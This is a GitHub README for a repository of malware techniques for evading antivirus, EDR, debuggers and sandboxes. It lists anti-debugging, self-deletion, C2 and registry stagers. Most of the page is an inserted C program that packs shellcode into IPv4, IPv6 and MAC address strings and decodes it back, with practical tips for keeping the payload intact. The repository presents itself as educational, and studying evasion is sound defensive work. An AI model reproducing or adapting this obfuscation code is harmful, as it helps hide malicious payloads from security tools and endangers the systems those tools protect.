
Research project showcasing various malware evasion techniques used to bypass AVs and EDRs, continuously updated with new methods.


AbdouRoumi/MalwareEvasionTechniques


Malware Evasion Techniques


Overview

Welcome to the MalwareEvasionTechniques repository! This project is a growing collection of malware evasion techniques that I am learning and implementing. The techniques in this repository are designed to bypass various detection mechanisms such as debuggers, EDRs, AVs, sandboxes, and other security defenses.

The goal of this repository is to document my learning journey and provide examples of different evasion strategies for educational purposes. The repository will be regularly updated as I explore new techniques.


Techniques Included

This repository currently includes the following evasion techniques, with more to come:

  • Anti-Debugging: Techniques to detect and evade debuggers.

    • AntiDebugging-SimpleFunc: A simple anti-debugging function.
    • AntiDebugging_Using_PEB: Anti-debugging using the Process Environment Block (PEB).
  • Self-Deletion: Methods that allow a malware sample to delete itself after execution.

    • Self_delete: Example of a self-deleting executable.
  • Custom Error Handling: Using custom error handling for evasion.

    • CustomError: Examples of evasion using custom error-handling routines.
  • XOR Encryption: Using XOR encryption so the payload is not stored in plaintext.

    • XorEncryption: Examples of evasion using XOR encryption.
  • Ipv4Obfuscation: Encoding the shellcode as IPv4 address strings for evasion.

  • Ipv6Obfuscation: Encoding the shellcode as IPv6 address strings for evasion.

  • MacObfuscation: Encoding the shellcode as MAC address strings for evasion.

  • Remote Process Scanner: Using CreateToolhelp32Snapshot to enumerate the other running processes.

  • Web Stager: Fetching the shellcode from a C2 server at runtime instead of embedding it in the binary.

  • Registry Stager: Using the Windows registry to store the shellcode outside the binary.
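The three address-string obfuscation entries above share one idea: the shellcode bytes are stored as strings that look like benign configuration data (IPv4, IPv6 or MAC addresses) and are parsed back into bytes at runtime. The C program below is an added example written for this page, not code from the repository: it generalizes the technique to all three formats with one encoder and one decoder, zero-pads the final string, and rejects malformed strings instead of silently decoding them. On Windows this kind of decoding is usually done with RtlIpv4StringToAddressA, RtlIpv6StringToAddressA and RtlEthernetStringToAddressA (the page does not say which parser the repository uses); the small parsers here are assumed stand-ins so the round trip runs on any platform, and the 14-byte sample shellcode is constructed for the demonstration.

```c
/* Added example, not the repository's code: packing shellcode bytes into IPv4,
 * IPv6 or MAC address strings and unpacking them again. The hand-written
 * parsers stand in for the Windows Rtl*StringToAddress helpers (an assumption
 * made so the round trip can be checked on any platform). */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ADDR_STR_MAX 40   /* uncompressed IPv6 is 39 chars + NUL */
enum { IPV4_CHUNK = 4, MAC_CHUNK = 6, IPV6_CHUNK = 16 };   /* bytes per string */

/* Constructed sample input: 14 bytes resembling an x64 stager prologue, sized
 * so that every format has to zero-pad its last string. */
static const uint8_t sample_shellcode[] = {
    0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00,
    0x00, 0x00, 0x41, 0x51, 0x41, 0x50
};

/* Render n (<= chunk) bytes as one address string, zero-padding the tail. */
static void bytes_to_addr(const uint8_t *p, size_t n, size_t chunk, char *out)
{
    uint8_t b[IPV6_CHUNK] = {0};
    memcpy(b, p, n);
    if (chunk == IPV4_CHUNK) {
        snprintf(out, ADDR_STR_MAX, "%u.%u.%u.%u",
                 (unsigned)b[0], (unsigned)b[1], (unsigned)b[2], (unsigned)b[3]);
        return;
    }
    /* MAC: "FC-48-..." one byte per group; IPv6: "FC48:83E4:..." two per group. */
    size_t pos = 0;
    for (size_t i = 0; i < chunk; i++) {
        pos += (size_t)snprintf(out + pos, ADDR_STR_MAX - pos, "%02X", (unsigned)b[i]);
        if (i + 1 < chunk && (chunk == MAC_CHUNK || i % 2 == 1))
            out[pos++] = (chunk == MAC_CHUNK) ? '-' : ':';
    }
    out[pos] = '\0';
}

/* Parse one address string into exactly `chunk` bytes; 0 on success, -1 if malformed. */
static int addr_to_bytes(const char *s, size_t chunk, uint8_t *out)
{
    if (chunk == IPV4_CHUNK) {
        unsigned v[4];
        char trailing;
        if (sscanf(s, "%u.%u.%u.%u%c", &v[0], &v[1], &v[2], &v[3], &trailing) != 4)
            return -1;                       /* wrong shape or trailing junk */
        for (int i = 0; i < 4; i++) {
            if (v[i] > 255) return -1;       /* octet out of range */
            out[i] = (uint8_t)v[i];
        }
        return 0;
    }
    size_t got = 0;                          /* hex formats: pairs of hex digits */
    for (const char *p = s; *p; p++) {
        if (*p == '-' || *p == ':') continue;
        if (got == chunk || !isxdigit((unsigned char)p[0]) || !isxdigit((unsigned char)p[1]))
            return -1;
        char pair[3] = { p[0], p[1], '\0' };
        out[got++] = (uint8_t)strtoul(pair, NULL, 16);
        p++;                                 /* consumed two hex digits */
    }
    return got == chunk ? 0 : -1;
}

/* Obfuscate len bytes into address strings; returns the count, or 0 if cap is too small. */
static size_t obfuscate(const uint8_t *sc, size_t len, size_t chunk,
                        char out[][ADDR_STR_MAX], size_t cap)
{
    size_t count = (len + chunk - 1) / chunk;
    if (count == 0 || count > cap) return 0;
    for (size_t i = 0; i < count; i++) {
        size_t off = i * chunk;
        size_t n = len - off < chunk ? len - off : chunk;
        bytes_to_addr(sc + off, n, chunk, out[i]);
    }
    return count;
}

/* Decode strings into out (at most out_len bytes). The decoder must know the true
 * shellcode length so the padding of the last string is dropped.
 * Returns bytes written, or 0 if any string is malformed. */
static size_t deobfuscate(char in[][ADDR_STR_MAX], size_t count, size_t chunk,
                          uint8_t *out, size_t out_len)
{
    size_t written = 0;
    for (size_t i = 0; i < count && written < out_len; i++) {
        uint8_t tmp[IPV6_CHUNK];
        if (addr_to_bytes(in[i], chunk, tmp) != 0) return 0;
        size_t n = out_len - written < chunk ? out_len - written : chunk;
        memcpy(out + written, tmp, n);
        written += n;
    }
    return written;
}

/* i-th address string of the sample in the given format (static buffer), or NULL. */
const char *sample_addr(size_t chunk, size_t i)
{
    static char strs[8][ADDR_STR_MAX];
    size_t n = obfuscate(sample_shellcode, sizeof sample_shellcode, chunk, strs, 8);
    return i < n ? strs[i] : NULL;
}

/* 1 if the sample survives obfuscate -> deobfuscate byte-for-byte in this format. */
int roundtrip_ok(size_t chunk)
{
    char strs[8][ADDR_STR_MAX];
    uint8_t back[sizeof sample_shellcode];
    size_t n = obfuscate(sample_shellcode, sizeof sample_shellcode, chunk, strs, 8);
    return n && deobfuscate(strs, n, chunk, back, sizeof back) == sizeof back
             && memcmp(back, sample_shellcode, sizeof back) == 0;
}

/* 1 if clearly malformed strings are rejected rather than silently decoded. */
int rejects_malformed(void)
{
    uint8_t tmp[IPV6_CHUNK];
    return addr_to_bytes("256.1.1.1", IPV4_CHUNK, tmp) == -1
        && addr_to_bytes("1.2.3", IPV4_CHUNK, tmp) == -1
        && addr_to_bytes("FC-48-83-E4-F0", MAC_CHUNK, tmp) == -1
        && addr_to_bytes("FC48:83E4:F0E8:C000:0000:4151:4150:00ZZ", IPV6_CHUNK, tmp) == -1;
}

int main(void)
{
    const size_t chunks[] = { IPV4_CHUNK, MAC_CHUNK, IPV6_CHUNK };
    for (size_t k = 0; k < 3; k++) {
        printf("chunk=%zu roundtrip=%d\n", chunks[k], roundtrip_ok(chunks[k]));
        for (size_t i = 0; sample_addr(chunks[k], i); i++)
            printf("  %s\n", sample_addr(chunks[k], i));
    }
    return 0;
}
```

Two practical points the one-line descriptions leave out: the decoder has to be given the real shellcode length (as a constant, for instance), otherwise the zero padding of the last string ends up as stray bytes after the payload; and a parser that silently accepts malformed input turns a typo in the string table into a corrupted payload rather than a clean failure, so the decoder above reports an error instead.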

Upcoming Techniques

This repository will continue to expand as I learn more. Here are some of the topics I plan to explore:

  • Code Obfuscation
  • Memory Evasion Techniques
  • Process Injection
  • Environment Detection
  • Encryptions

Stay tuned for updates!

Installation

To set up and run the examples in this repository:

  1. Clone the Repository:

    git clone https://github.com/AbdouRoumi/MalwareEvasionTechniques.git
  2. Open the Solution:

    • Open MalwareEvasionTechniques.sln in Visual Studio.
  3. Build the Solution:

    • Build the solution using the appropriate configuration (Debug/Release).
  4. Run the Executables:

    • Execute the compiled binaries to observe the malware evasion techniques in action.

Usage

Each directory contains a specific evasion technique with relevant source code. You can explore the code, build it, and run it to see how the evasion works. The code is documented to help you understand the logic behind each technique.

# Example
cd Self_delete
# Open the solution and build the project

Contributing

Contributions are welcome! If you have additional evasion techniques or improvements to existing ones, feel free to submit a pull request. Please ensure your contributions adhere to ethical guidelines and are intended for educational and research purposes only.

Disclaimer

This repository is for educational and research purposes only. The techniques demonstrated here are intended to help security professionals understand and defend against malware evasion tactics. Misuse of the information contained in this repository is not condoned by the author.

License

This project is licensed under the MIT License. See the LICENSE file for details.
